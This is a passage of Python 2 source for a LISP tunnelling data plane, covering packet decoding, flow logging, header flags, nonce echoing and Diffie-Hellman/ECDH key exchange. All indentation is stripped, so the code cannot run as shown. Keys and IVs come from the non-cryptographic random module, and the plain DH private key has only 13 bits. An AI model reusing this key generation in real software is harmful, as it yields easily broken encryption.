self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#endif
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endof
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#endif
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# a echo response and some time (10 seconds) has past.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start echoing the nonce. Get a new nonce. If a echo-nonce is stored
# use the same nonce as last time regardless if we received an echo
# response. High-order bit set is telling caller to set the e-bit in
# header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long its been since last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happen so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# its a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at at time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
